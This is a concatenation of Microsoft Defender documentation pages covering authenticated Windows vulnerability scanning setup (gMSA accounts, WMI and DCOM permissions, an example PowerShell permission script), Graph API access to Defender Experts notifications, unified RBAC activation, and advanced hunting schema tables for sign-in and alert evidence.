-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-Authenticated scan for Windows provides the ability to run scans on unmanaged Windows devices. You can remotely target by IP ranges or hostnames and scan Windows services by providing Microsoft Defender Vulnerability Management with credentials to remotely access the devices. Once configured the targeted unmanaged devices will be scanned regularly for software vulnerabilities. By default, the scan will run every four hours with options to change this interval or have it only run once.
-
-Security administrators can then see the latest security recommendations and review recently discovered vulnerabilities for the targeted device in the [Microsoft Defender portal](https://security.microsoft.com).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Scanner Installation
-
-Similar to [network device](../defender-endpoint/network-devices.md) authenticated scan, you'll need a scanning device with the scanner installed. If you don't already have the scanner installed, see [Install the scanner](../defender-endpoint/network-devices.md#install-the-scanner) for steps on how to download and install it.
-
-> [!NOTE]
-> No changes are required for pre-existing installed scanners.
-
-## Pre-requisites
-
-The following section lists the pre-requisites you need to configure to use Authenticated scan for Windows.
-
-### Scanning account
-
-A scanning account is required to remotely access the devices. This must be a [Group Managed Service Account (gMsa)](/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview/).
-
-> [!NOTE]
-> We recommend the gMSA account is a least privileged account with only the required scanning permissions and is set to cycle the password regularly.
-
-To create a gMsa account:
-
-1. On your domain controller in a PowerShell window, run:
-
- ```powershell
- New-ADServiceAccount -Name gmsa1 -PrincipalsAllowedToRetrieveManagedPassword scanner-win11-i$ -KerberosEncryptionType RC4, AES128, AES256 -Verbose
- ```
-
- - gmsa1 stands for the name of the account you are creating, and scanner-win11-I$ stands for the machine name where the scanner agent will run. Only this machine will be able to retrieve the account password. You can provide a comma separated list of machines.
- - Modifying an existing account can be done with *Get-ADServiceAccount* and *Set-ADServiceAccount*
-
-2. To Install the AD Service Account, on the machine where the scanner agent will run using an elevated PowerShell window, run:
-
- ```powershell
- Install-ADServiceAccount -Identity gmsa1
- ```
-
-If your PowerShell doesn't recognize those commands, it probably means you're missing a required PowerShell module. Instructions on how to install the module vary depending on your operating system. For more information, see [Getting Started with Group Managed Service Accounts](/windows-server/security/group-managed-service-accounts/getting-started-with-group-managed-service-accounts/).
-
-### Devices to be scanned
-
-Use the table below for guidance on the configurations required, along with the permissions needed for the scanning account, on each device to be scanned:
-
-> [!NOTE]
-> The below steps are only one recommended way to configure the permissions on each device to be scanned and uses the Performance Monitor Users group. You can also configure the permissions in the following ways:
->
-> - Add the account to a different user group and give all the permissions required to that group.
-> - Give these permissions explicitly to the scanning account.
->
-> To configure and apply the permission to a group of devices to be scanned using a group policy, see [Configure a group of devices with a group policy](#configure-a-group-of-devices-with-a-group-policy).
-
-|Devices to be scanned requirements|Description|
-|:|:|
-|Windows Management Instrumentation (WMI) is enabled|To enable remote Windows Management Instrumentation (WMI): <ul><li>Verify the Windows Management Instrumentation service is running.</li><li>Go to **Control Panel** \> **All Control Panel Items** \> **Windows Defender Firewall** \> **Allowed applications** and ensure Windows Management Instrumentation (WMI) is allowed through Windows Firewall.</li></ul>|
-|Scanning account is a member of Performance Monitor Users group|The scanning account must be a member of the **Performance Monitor Users** group on the device to be scanned.|
-|Performance Monitor Users group has 'Enable Account' and 'Remote Enable' permissions on Root/CIMV2 WMI namespace|To verify or enable these permissions: <ul><li>Run wmimgmt.msc.</li><li>Right click **WMI Control (Local)** and select **Properties**.</li><li>Go to the Security tab.</li><li>Select the relevant WMI namespace and select **Security**.</li><li>Add the specified group and select to allow the specific permissions.</li><li>Select **Advanced**, choose the specified entry and select **Edit**.</li><li>Set **Applies To** to "This namespace and subnamespaces".</li></ul>|
-|**Performance Monitor Users** group should have permissions on DCOM operations|To verify or enable these permissions: <ul><li>Run dcomcnfg.</li><li>Navigate to **Component Services** \> **Computers** \> **My Computer**.</li><li>Right click My Computer and choose **Properties**.</li><li>Go to the COM Security tab.</li><li>Go to **Launch and Activation Permissions** and select **Edit Limits**.</li><li>Add the specified group and select to allow **Remote Activation**.</li></ul>|
-
-### Configure a group of devices with a group policy
-
-A group policy will let you bulk apply the configurations required, as well as the permissions required for the scanning account, to a group of devices to be scanned.
-
-Follow these steps on a domain controller to configure a group of devices at the same time:
-
-|Step|Description|
-|||
-|Create a new Group Policy Object|<ul><li>On the domain controller open the Group Policy Management Console.</li><li>Follow these steps to [Create a Group Policy Object](/windows/security/threat-protection/windows-firewall/create-a-group-policy-object).</li><li>Once your Group Policy Object (GPO) is created, right-click on your GPO and select **Edit** to open the Group Policy Management Editor console and complete the steps below.</li></ul>|
-|Enable Windows Management Instrumentation (WMI)|To enable remote Windows Management Instrumentation (WMI): <ul><li>Go to **Computer Configuration** \> **Policies** \> **Windows Settings** \> **Security Settings** \> **System Services**.</li><li>Right-click **Windows Management Instrumentation**.</li><li>Select the **Define this policy setting** box and choose **Automatic**.</li></ul>|
-|Allow WMI through the firewall|To allow Windows Management Instrumentation (WMI) through the firewall: <ul><li>Go to **Computer Configuration** \> **Policies** \> **Windows Settings** \> **Security Settings** \> **Windows Defender Firewall and Advanced Security** \> **Inbound Rules**.</li><li>Right-click and select **New Rule**.</li><li>Choose **Predefined** and select **Windows Management Instrumentation (WMI)** from the list. Then select **Next**.</li><li>Select the **Windows Management Instrumentation (WMI-In)** checkbox. Then select **Next**.</li><li>Select **Allow the connection**. Then select **Finish**.</li><li>Right-click the newly added rule and select **Properties**.</li><li>Go to the **Advanced** tab and uncheck the **Private** and **Public** options as only **Domain** is required.</li></ul>|
-|Grant permissions to perform DCOM operations|To grant permissions to perform DCOM operations: <ul><li>Go to **Computer Configuration** \> **Policies** \> **Windows Settings** \> **Security Settings** \> **Local Policies** \> **Security Operations**.</li><li>Right-click **DCOM: Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) syntax** and select **Properties**.</li><li>Select **Define this policy setting** box and select **Edit Security**.</li><li>Add the user or group you are granting permissions to and select **Remote Activation**.</li></ul>|
-|Grant permissions to the Root\CIMV2 WMI namespace by running a PowerShell script via group policy:|<ul><li>Create a PowerShell script. See the [Example PowerShell script](#example-powershell-script) later in this article for a recommended script you can modify according to your needs.</li><li>Go to **Computer Configuration** \> **Policies** \> **Windows Settings** \> **Scripts (Startup/Shutdown)** \> **Startup**</li><li>Go to the **PowerShell Scripts** tab.</li><li>Select **Show Files** and copy the script you created to this folder</li><li>Return to the scripts configuration windows and select **Add**.</li><li>Enter the script name.</li></ul>|
-
-#### Example PowerShell script
-
-Use the following PowerShell script as a starting point to grant permissions to the Root\CIMV2 WMI namespace via group policy:
-
-```powershell
-Param ()
-
-Process {
- $ErrorActionPreference = "Stop"
- $accountSID = "S-1-5-32-558" # Performance Monitor Users built-in group, please change or pass parameter as you wish
- $computerName = "."
-
- $remoteparams = @{ComputerName=$computerName}
- $invokeparams = @{Namespace="root\cimv2";Path="__systemsecurity=@"} + $remoteParams
-
- $output = Invoke-WmiMethod @invokeparams -Name GetSecurityDescriptor
- if ($output.ReturnValue -ne 0) {
- throw "GetSecurityDescriptor failed: $($output.ReturnValue)"
- }
-
- $acl = $output.Descriptor
-
- $CONTAINER_INHERIT_ACE_FLAG = 0x2
- $ACCESS_MASK = 0x21 # Enable Account + Remote Enable
-
- $ace = (New-Object System.Management.ManagementClass("win32_Ace")).CreateInstance()
- $ace.AccessMask = $ACCESS_MASK
- $ace.AceFlags = $CONTAINER_INHERIT_ACE_FLAG
-
- $trustee = (New-Object System.Management.ManagementClass("win32_Trustee")).CreateInstance()
- $trustee.SidString = $accountSID
- $ace.Trustee = $trustee
-
- $ACCESS_ALLOWED_ACE_TYPE = 0x0
-
- $ace.AceType = $ACCESS_ALLOWED_ACE_TYPE
-
- $acl.DACL += $ace.psobject.immediateBaseObject
-
- $setparams = @{Name="SetSecurityDescriptor";ArgumentList=$acl.psobject.immediateBaseObject} + $invokeParams
-
- $output = Invoke-WmiMethod @setparams
- if ($output.ReturnValue -ne 0) {
- throw "SetSecurityDescriptor failed: $($output.ReturnValue)"
- }
-}
-```
-
-Once the GPO policy is applied to a device, all the required settings will be applied and your gMSA account will be able to access and scan the device.
-
-## Configure a new authenticated scan
-
-To configure a new authenticated scan:
-
-1. Go to **Settings** > **Device discovery** > **Authenticated scans** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select **Add new scan** and choose **Windows authenticated scan** and select **Next**.
-
- :::image type="content" source="../../media/defender-vulnerability-management/authenticated-scan.png" alt-text="Screenshot of the add new authenticated scan screen" lightbox="../../media/defender-vulnerability-management/authenticated-scan.png":::
-
-3. Enter a **Scan name**.
-4. Select the **Scanning device:** The onboarded device you'll use to scan the unmanaged devices.
-5. Enter the **Target (range):** The IP address ranges or hostnames you want to scan. You can either enter the addresses or import a CSV file. Importing a file will override any manually added addresses.
-6. Select the **Scan interval:** By default, the scan will run every four hours, you can change the scan interval or have it only run once, by selecting 'Do not repeat'.
-7. Choose your **Authentication method** - there are two options to choose from:
- - Kerberos (preferred)
- - Negotiate
-
- > [!NOTE]
- > Negotiate option will fallback to NTLM in cases where Kerberos fails. Using NTLM is not recommended as it is not a secure protocol.
-
-8. Enter the credentials Microsoft Defender Vulnerability Management will use to remotely access the devices:
-
- - **Use azure KeyVault:** If you manage your credentials in Azure KeyVault you can enter the Azure KeyVault URL and Azure KeyVault secret name to be accessed by the scanning device to provide credentials
- - For the Azure KeyVault secret value use [gMSA account details](/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview/) in the format **Domain;Username**
-9. Select **Next** to run or skip the test scan. For more information on test scans, see [Scan and add network devices](../defender-endpoint/network-devices.md#scan-and-add-network-devices).
-10. Select **Next** to review the settings and then select **Submit** to create your new authenticated scan.
-
-> [!NOTE]
-> As the authenticated scanner currently uses an encryption algorithm that is not compliant with [Federal Information Processing Standards (FIPS)](/windows/security/threat-protection/security-policy-settings/system-cryptography-use-fips-compliant-algorithms-for-encryption-hashing-and-signing/), the scanner can't operate when an organization enforces the use of FIPS compliant algorithms.
->
-> To allow algorithms that are not compliant with FIPS, set the following value in the registry for the devices where the scanner will run: Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy with a DWORD value named **Enabled** and value of **0x0**
->
-> FIPS compliant algorithms are only used in relation to departments and agencies of the United States federal government.
-
-### Authenticated scan for Windows APIs
-
-You can use APIs to create a new scan and view all existing configured scans in your organization. For more information, see:
--- [Get all scan definitions](../defender-endpoint/get-all-scan-definitions.md)-- [Add, delete or update a scan definition](../defender-endpoint/add-a-new-scan-definition.md)-- [Get all scan agents](../defender-endpoint/get-all-scan-agents.md)-- [Get scan agent by Id](../defender-endpoint/Get-agent-details.md)-- [Get scan history by definition](../defender-endpoint/get-scan-history-by-definition.md)-- [Get scan history by session](../defender-endpoint/get-scan-history-by-session.md)-
-## Related articles
--- [Network devices](../defender-endpoint/network-devices.md)
security Access Den Graph Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/access-den-graph-api.md
- Title: Accessing Defender Experts notifications using Graph security API-
-description: The method to access Defender Experts Notifications using Graph security API
------
- - m365-security
- - tier1
- - essentials-overview
- Previously updated : 04/18/2024--
-# Access incident notifications using Graph API
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-[Defender Experts Notifications](onboarding-defender-experts-for-hunting.md#receive-defender-experts-notifications) are incidents that have been generated from hunting conducted by Defender Experts in your environment. They contain information regarding the hunting investigation and recommended actions provided by Defender Experts. You can now access DENs using the [Microsoft Graph security API](/graph/api/resources/security-api-overview).
-
-> [!NOTE]
-> Any incident in the Microsoft Defender portal is a collection of correlated alerts. [Learn more](/graph/api/resources/security-incident)
-
-The following Defender Experts Notification details are available in the Microsoft Defender portal:
--- **Incident title** - starts with _Defender Experts_ to distinguish Defender Experts Notifications from other incidents-- **Executive summary** - provides an overview of the investigation summary-- **Recommendation summary** - lists the recommended actions from Defender Experts-- **Advanced hunting queries** - lists the converted KQL hunting queries used for the investigation-
-In Microsoft Graph security API, the following fields are also available:
--- **Graph endpoint** - <https://graph.microsoft.com/beta/security/incidents>-- The following **field names** that correspond to the details mentioned earlier:
- - displayName
- - description
- - recommendedActions
- - recommendedHuntingQueries
-
-> [!NOTE]
-> These fields will soon be available in Graph v1.0 endpoint. For more details, see [Microsoft Graph REST API v1.0](/graph/api/resources/security-incident)
-
-Your approach to consuming Defender Experts Notifications from the API will vary depending on the downstream system you intend to use and your specific requirements. However, the following is a basic implementation to help you get started:
-
-1. Get incidents from Graph security API
-2. Check for new incidents where **displayName** starts with _Defender Experts_
-3. Continue reading the remaining fields for such incidents
-4. Synchronize the Defender Experts Notification information into your downstream tool (for example, ServiceNow).
-
-### Next step
--- [Collaborate with Experts on Demand](experts-on-demand.md)
security Activate Defender Rbac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/activate-defender-rbac.md
- Title: Activate Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Activate Microsoft Defender XDR Security unified role-based access control(RBAC)
------- m365-security-- tier3-- Previously updated : 08/03/2023---
-# Activate Microsoft Defender XDR Unified role-based access control (RBAC)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-For the Microsoft Defender XDR security portal to start enforcing the permissions and assignments configured in your new [custom roles](create-custom-rbac-roles.md) or [imported roles](import-rbac-roles.md) you must activate the Microsoft Defender XDR Unified RBAC model for some or all of your workloads.
-
-<a name='activate-microsoft-365-defender-unified-rbac'></a>
-
-## Activate Microsoft Defender XDR Unified RBAC
-
-The following steps guide you on how to activate the Microsoft Defender XDR Unified RBAC model. You can activate your workloads in the following ways:
-
-1. [Activate in the permissions and roles page](#activate-from-the-permissions-and-roles-page)
-2. [Activate in Microsoft Defender XDR settings](#activate-in-microsoft-365-defender-settings)
-
-> [!IMPORTANT]
-> You must be a Global Administrator or Security Administrator in Microsoft Entra ID to perform this task. For more information on permissions, see [Permission pre-requisites](../defender/manage-rbac.md#permissions-pre-requisites).
-
-### Activate from the Permissions and roles page
-
-Sign in to the [Microsoft Defender portal](https://security.microsoft.com). In the navigation pane, select **Permissions** and select **Roles** under Microsoft Defender XDR to get to the Permissions and roles page.
-
-You can activate your workloads in two ways from the Permissions and roles page:
--
-1. **Activate workloads**
- - Select **Activate workloads** on the banner above the list of roles.
- - This will bring you directly to the **Activate workloads** screen.
- - You must activate each workload one by one. Once you select the individual toggle, you'll activate (or deactivate) that workload.
-
- :::image type="content" source="../../media/defender/m365-defender-rbac-activate-workload-selection1.png" alt-text="Screenshot of the choose workloads to activate screen" lightbox="../../media/defender/m365-defender-rbac-activate-workload-selection1.png":::
-
- > [!NOTE]
- > The **Activate workloads** button is only available when there is it at least one workload that's not active for Microsoft Defender XDR Unified RBAC.
-
- > [!NOTE]
- > Microsoft Defender for Cloud is active by default with Microsoft Defender XDR Unified RBAC.
-
- > [!NOTE]
- > To activate Exchange Online permissions in Microsoft Defender XDR Unified RBAC, Defender for Office 365 permissions must be active.
-
-2. **Workload settings**
- - Select **Workload settings**.
- - This brings you to the Microsoft Defender XDR **Permission and roles** page.
- - Select the toggle for the workload you want to activate.
- - Select Activate on the confirmation message.
-
-You have now successfully activated (or deactivated) that workload.
-
-<a name='activate-in-microsoft-365-defender-settings'></a>
-
-### Activate in Microsoft Defender XDR settings
-
-Follow these steps to activate your workloads directly in Microsoft Defender XDR settings:
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com).
-2. In the navigation pane, select **Settings**.
-3. Select **Microsoft Defender XDR**.
-4. Select **Permissions and roles**. This brings you to the **Activate workloads** page.
-5. Select the toggle for the workload you want to activate.
-6. Select Activate on the confirmation message.
-
-You have now successfully activated (or deactivated) that workload.
-
-> [!NOTE]
-> The Microsoft Defender XDR Unified RBAC model only impacts the Microsoft Defender XDR security portal. It does not impact the [Microsoft Purview Compliance center](https://compliance.microsoft.com) or the [Exchange Admin Center](https://admin.exchange.microsoft.com).
-
-<a name='deactivate-microsoft-365-defender-unified-rbac'></a>
-
-## Deactivate Microsoft Defender XDR Unified RBAC
-
-You can deactivate Microsoft Defender XDR Unified RBAC and revert to the individual RBAC models from Microsoft Defender for Endpoint, Microsoft Defender for Identity, and Microsoft Defender for Office 365 (Exchange Online Protection).
-
-To Deactivate the workloads, repeat the steps above and select the workloads you want to deactivate. The status will be set to **Not Active**.
-
-If you deactivate a workload, the roles created and edited within Microsoft Defender XDR Unified RBAC won't be effective and you'll return to using the previous permissions model. This will remove any access that users assigned these roles have.
-
-## Next steps
--- [Edit or delete roles](edit-delete-rbac-roles.md)
security Additional Information Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/additional-information-xdr.md
- Title: Important considerations related to Defender Experts for XDR-
-description: Additional information and important considerations related to Defender Experts for XDR
-keywords: XDR, managed response, incident response, managed threat hunting, managed detection and response (MDR) service, readiness assessment, real-time visibility with XDR experts, Additional information related to XDR, benefits of microsoft xdr
--
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - tier1
- Previously updated : 11/10/2023--
-# Important considerations for Microsoft Defender Experts for XDR
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-To realize the benefits of Microsoft Defender Experts for XDR, you and your security operations center (SOC) team must take note of the following considerations to ensure timely incident remediation, improve your organization's security posture, and protect your organization from threats.
--- **Engage actively through the readiness assessment process** ΓÇô The [readiness assessment](get-started-xdr.md#prepare-your-environment-for-the-defender-experts-service) when onboarding for Defender Experts for XDR is an integral part of the offering. Completing it successfully ensures prompt service coverage and protects your organization against known threats.-- **Act on managed responses in a timely manner** ΓÇô For any suspicious incidents and alerts, our experts provide a detailed investigation summary and managed responses for remediation. We expect your SOC team to act on these managed responses in a timely manner to prevent further impact from any malicious attempts.-- **Configure recommended settings and follow best practices to improve security posture** ΓÇô As part of our service, your service delivery manager and security analyst team share ongoing recommendations to strengthen your security posture. These recommendations are based on incidents investigated in your organization. Your SOC team should review these recommendations and implement them as soon as possible to protect your organization against future threats.-
-### Note about incident response
-
-Defender Experts for XDR isn't an incident response (IR) service. While it augments your SOC team to triage, investigate, and remediate threats, Defender Experts for XDR won't be able to provide recovery and crisis management services **if a major security incident has already occurred** in your organization. You should engage instead with your own security IR provider to address urgent incident response issues.
-
-If you don't have your own security IR team, [Microsoft Incident Response](https://www.microsoft.com/en-us/security/business/microsoft-incident-response
-) can help mitigate a breach and recover your operations. If you're an existing unified or premier support customer, create a support request in the [Microsoft Services Hub](https://serviceshub.microsoft.com/home) to engage with them. Otherwise, fill out the [Experiencing a Cybersecurity Incident?](https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=v4j5cvGGr0GRqy180BHbRypQlJUvhTFIvfpiAfrpFQdUOTdRRFpDUFQ1TzNLVFZXV0VUOVlVN0szUiQlQCN0PWcu) form. We'll review the details and quickly call you with instructions to get started.
-
-### See also
--- [General information on Defender Experts for XDR service](frequently-asked-questions.md)-- [How Microsoft Defender Experts for XDR permissions work](dex-xdr-permissions.md)-
security Advanced Hunting Aadsignineventsbeta Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-aadsignineventsbeta-table.md
- Title: AADSignInEventsBeta table in the advanced hunting schema
-description: Learn about the Microsoft Entra sign-in events table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# AADSignInEventsBeta
-
-**Applies to:**
--- Microsoft Defender XDR-
-> [!IMPORTANT]
-> The `AADSignInEventsBeta` table is currently in beta and is being offered on a short-term basis to allow you to hunt through Microsoft Entra sign-in events. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table. All sign-in schema information will eventually move to the `IdentityLogonEvents` table.
-
-The `AADSignInEventsBeta` table in the advanced hunting schema contains information about Microsoft Entra interactive and non-interactive sign-ins. Learn more about sign-ins in [Microsoft Entra sign-in activity reports - preview](/azure/active-directory/reports-monitoring/concept-all-sign-ins).
-
-Use this reference to construct queries that return information from the table. For information on other tables in the advanced hunting schema, see the [advanced hunting reference](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-reference).
-
-<br>
-
-****
-
-|Column name|Data type|Description|
-||||
-|`Timestamp`|`datetime`|Date and time when the record was generated|
-|`Application`|`string`|Application that performed the recorded action|
-|`ApplicationId`|`string`|Unique identifier for the application|
-|`LogonType`|`string`|Type of logon session, specifically interactive, remote interactive (RDP), network, batch, and service|
-|`ErrorCode`|`int`|Contains the error code if a sign-in error occurs. To find a description of a specific error code, visit <https://aka.ms/AADsigninsErrorCodes>.|
-|`CorrelationId`|`string`|Unique identifier of the sign-in event|
-|`SessionId`|`string`|Unique number assigned to a user by a website's server for the duration of the visit or session|
-|`AccountDisplayName`|`string`|Name displayed in the address book entry for the account user. This is usually a combination of the given name, middle initial, and surname of the user.|
-|`AccountObjectId`|`string`|Unique identifier for the account in Microsoft Entra ID|
-|`AccountUpn`|`string`|User principal name (UPN) of the account|
-|`IsExternalUser`|`int`|Indicates if the user that signed in is external. Possible values: -1 (not set), 0 (not external), 1 (external).|
-|`IsGuestUser`|`boolean`|Indicates whether the user that signed in is a guest in the tenant|
-|`AlternateSignInName`|`string`|On-premises user principal name (UPN) of the user signing in to Microsoft Entra ID|
-|`LastPasswordChangeTimestamp`|`datetime`|Date and time when the user that signed in last changed their password|
-|`ResourceDisplayName`|`string`|Display name of the resource accessed. The display name can contain any character.|
-|`ResourceId`|`string`|Unique identifier of the resource accessed|
-|`ResourceTenantId`|`string`|Unique identifier of the tenant of the resource accessed|
-|`DeviceName`|`string`|Fully qualified domain name (FQDN) of the device|
-|`AadDeviceId`|`string`|Unique identifier for the device in Microsoft Entra ID|
-|`OSPlatform`|`string`|Platform of the operating system running on the device. Indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10, and Windows 7.|
-|`DeviceTrustType`|`string`|Indicates the trust type of the device that signed in. For managed device scenarios only. Possible values are Workplace, AzureAd, and ServerAd.|
-|`IsManaged`|`int`|Indicates whether the device that initiated the sign-in is a managed device (1) or not a managed device (0)|
-|`IsCompliant`|`int`|Indicates whether the device that initiated the sign-in is compliant (1) or non-compliant (0)|
-|`AuthenticationProcessingDetails`|`string`|Details about the authentication processor|
-|`AuthenticationRequirement`|`string`|Type of authentication required for the sign-in. Possible values: multiFactorAuthentication (MFA was required) and singleFactorAuthentication (no MFA was required).|
-|`TokenIssuerType`|`int`|Indicates if the token issuer is Microsoft Entra ID (0) or Active Directory Federation Services (1)|
-|`RiskLevelAggregated`|`int`|Aggregated risk level during sign-in. Possible values: 0 (aggregated risk level not set), 1 (none), 10 (low), 50 (medium), or 100 (high).|
-|`RiskDetails`|`int`|Details about the risky state of the user that signed in|
-|`RiskState`|`int`|Indicates risky user state. Possible values: 0 (none), 1 (confirmed safe), 2 (remediated), 3 (dismissed), 4 (at risk), or 5 (confirmed compromised).|
-|`UserAgent`|`string`|User agent information from the web browser or other client application|
-|`ClientAppUsed`|`string`|Indicates the client app used|
-|`Browser`|`string`|Details about the version of the browser used to sign in|
-|`ConditionalAccessPolicies`|`string`|Details of the conditional access policies applied to the sign-in event|
-|`ConditionalAccessStatus`|`int`|Status of the conditional access policies applied to the sign-in. Possible values are 0 (policies applied), 1 (attempt to apply policies failed), or 2 (policies not applied).|
-|`IPAddress`|`string`|IP address assigned to the device during communication|
-|`Country`|`string`|Two-letter code indicating the country/region where the client IP address is geolocated|
-|`State`|`string`|State where the sign-in occurred, if available|
-|`City`|`string`|City where the account user is located|
-|`Latitude`|`string`|The north to south coordinates of the sign-in location|
-|`Longitude`|`string`|The east to west coordinates of the sign-in location|
-|`NetworkLocationDetails`|`string`|Network location details of the authentication processor of the sign-in event|
-|`RequestId`|`string`|Unique identifier of the request|
-|`ReportId`|`string`|Unique identifier for the event|
-
-## Related articles
--- [AADSpnSignInEventsBeta](./advanced-hunting-aadspnsignineventsbeta-table.md)-- [Advanced hunting overview](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-overview)-- [Learn the query language](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-query-language)-- [Understand the schema](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-schema-reference)
security Advanced Hunting Aadspnsignineventsbeta Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-aadspnsignineventsbeta-table.md
- Title: AADSpnSignInEventsBeta table in the advanced hunting schema
-description: Learn about information associated with Microsoft Entra service principal and managed identity sign-in events table.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# AADSpnSignInEventsBeta
-
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> The `AADSpnSignInEventsBeta` table is currently in beta and is being offered on a short-term basis to allow you to hunt through Microsoft Entra sign-in events. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table. Microsoft will eventually move all sign-in schema information to the `IdentityLogonEvents` table.
-
-The `AADSpnSignInEventsBeta` table in the advanced hunting schema contains information about Microsoft Entra service principal and managed identity sign-ins. You can learn more about the different kinds of sign-ins in [Microsoft Entra sign-in activity reports - preview](/azure/active-directory/reports-monitoring/concept-all-sign-ins).
-
-Use this reference to construct queries that return information from the table.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-reference).
-
-<br>
-
-****
-
-|Column name|Data type|Description|
-|--||--|
-|`Timestamp`|`datetime`|Date and time when the record was generated|
-|`Application`|`string`|Application that performed the recorded action|
-|`ApplicationId`|`string`|Unique identifier for the application|
-|`IsManagedIdentity`|`boolean`|Indicates whether the sign-in was initiated by a managed identity|
-|`ErrorCode`|`int`|Contains the error code if a sign-in error occurs. To find a description of a specific error code, visit <https://aka.ms/AADsigninsErrorCodes>.|
-|`CorrelationId`|`string`|Unique identifier of the sign-in event|
-|`ServicePrincipalName`|`string`|Name of the service principal that initiated the sign-in|
-|`ServicePrincipalId`|`string`|Unique identifier of the service principal that initiated the sign-in|
-|`ResourceDisplayName`|`string`|Display name of the resource accessed. The display name can contain any character.|
-|`ResourceId`|`string`|Unique identifier of the resource accessed|
-|`ResourceTenantId`|`string`|Unique identifier of the tenant of the resource accessed|
-|`IPAddress`|`string`|IP address assigned to the endpoint and used during related network communications|
-|`Country`|`string`|Two-letter code indicating the country where the client IP address is geolocated|
-|`State`|`string`|State where the sign-in occurred, if available|
-|`City`|`string`|City where the account user is located|
-|`Latitude`|`string`|The north to south coordinates of the sign-in location|
-|`Longitude`|`string`|The east to west coordinates of the sign-in location|
-|`RequestId`|`string`|Unique identifier of the request|
-|`ReportId`|`string`|Unique identifier for the event|
-
-## Related articles
--- [AADSignInEventsBeta](./advanced-hunting-aadsignineventsbeta-table.md)-- [Advanced hunting overview](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-overview)-- [Learn the query language](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-query-language)-- [Understand the schema](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-schema-reference)
security Advanced Hunting Alertevidence Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-alertevidence-table.md
- Title: AlertEvidence table in the advanced hunting schema
-description: Learn about information associated with alerts in the AlertEvidence table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# AlertEvidence
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `AlertEvidence` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about various entitiesΓÇöfiles, IP addresses, URLs, users, or devicesΓÇöassociated with alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, and Microsoft Defender for Identity. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `AlertId` | `string` | Unique identifier for the alert |
-| `Title` | `string` | Title of the alert |
-| `Categories` | `string` | List of categories that the information belongs to, in JSON array format |
-| `AttackTechniques` | `string` | MITRE ATT&CK techniques associated with the activity that triggered the alert |
-| `ServiceSource` | `string` | Product or service that provided the alert information |
-| `DetectionSource` | `string` | Detection technology or sensor that identified the notable component or activity |
-| `EntityType` | `string` | Type of object, such as a file, a process, a device, or a user |
-| `EvidenceRole` | `string` | How the entity is involved in an alert, indicating whether it is impacted or is merely related |
-| `EvidenceDirection` | `string` | Indicates whether the entity is the source or the destination of a network connection |
-| `FileName` | `string` | Name of the file that the recorded action was applied to |
-| `FolderPath` | `string` | Folder containing the file that the recorded action was applied to |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populatedΓÇöuse the SHA1 column when available. |
-| `FileSize` | `long` | Size of the file in bytes |
-| `ThreatFamily` | `string` | Malware family that the suspicious or malicious file or process has been classified under |
-| `RemoteIP` | `string` | IP address that was being connected to |
